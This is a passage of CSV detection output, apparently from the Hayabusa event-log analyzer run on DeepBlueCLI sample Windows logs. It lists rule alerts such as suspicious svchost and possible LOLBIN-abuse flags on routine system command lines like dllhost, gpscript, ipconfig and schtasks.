Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:46.328 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:46.359 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:46.359 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:46.468 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:46.468 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:46.484 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:46.484 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:46.531 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent 
Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:46.531 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:46.812 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:46.812 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:47.203 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:47.203 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:47.806 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6f4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:47.978 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:47.978 
+00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:48.009 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:48.009 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:48.165 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x2f0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:58.196 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:57:01.618 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x990 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:57:01.634 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:57:01.696 
+00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0x9f0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:57:01.774 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:57:03.862 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xb8c | User: IEUser | LID: 0x671c2",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:57:04.003 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:57:04.003 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:57:04.729 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xbf0 | User: IEUser | LID: 0x671c2,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:57:04.729 +00:00,IE10Win7,4688,medium,Exec | Evas,False Sysinternals Suite 
Tools,,rules/sigma/process_creation_builtin/proc_creation_win_false_sysinternalsuite.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:57:05.547 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc18 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:59:47.225 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 23:05:28.818 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x984 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 23:05:29.021 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x958 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 14:56:52.442 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 14:56:52.614 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\sc.exe start 
w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0xb00 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 14:56:53.723 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x988 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 14:56:53.973 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x22c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 14:56:55.848 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0x810 | User: IEUser | LID: 0x671f0",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 14:56:55.848 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 14:57:03.208 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | 
PID: 0x978 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 14:57:07.317 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 14:57:07.473 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 14:57:32.774 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb28 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 14:57:36.030 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x4a8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:09:39.097 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x944 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:09:42.379 +00:00,IE10Win7,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1ac | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:09:43.691 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:10:22.816 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf28 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:10:26.441 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1b8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:10:58.472 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:10:58.472 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:11:06.222 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent 
Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:12:04.478 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0x14c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:12:15.000 +00:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 15:13:03.000 +00:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 15:13:03.078 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:03.078 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:03.203 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:03.203 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:03.234 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent 
Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:03.234 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:03.421 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:03.421 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:03.468 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:03.468 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:03.875 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:03.875 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:04.515 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 
15:13:04.515 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:04.781 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:04.781 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:05.430 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\poweron-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x678 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:05.758 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x790 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:06.211 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:06.211 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 
15:13:06.290 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:06.290 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:06.461 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x454 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:14.758 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x974 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:14.805 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:14.868 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0x9d4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:14.961 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent 
Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:15.758 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:18.164 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xb8c | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:18.235 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:18.235 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:18.465 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xbe0 | User: IEUser | LID: 0x6590f,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:18.465 +00:00,IE10Win7,4688,medium,Exec | Evas,False Sysinternals Suite Tools,,rules/sigma/process_creation_builtin/proc_creation_win_false_sysinternalsuite.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:20.357 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: 
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc28 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:40.443 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe70 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:40.474 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 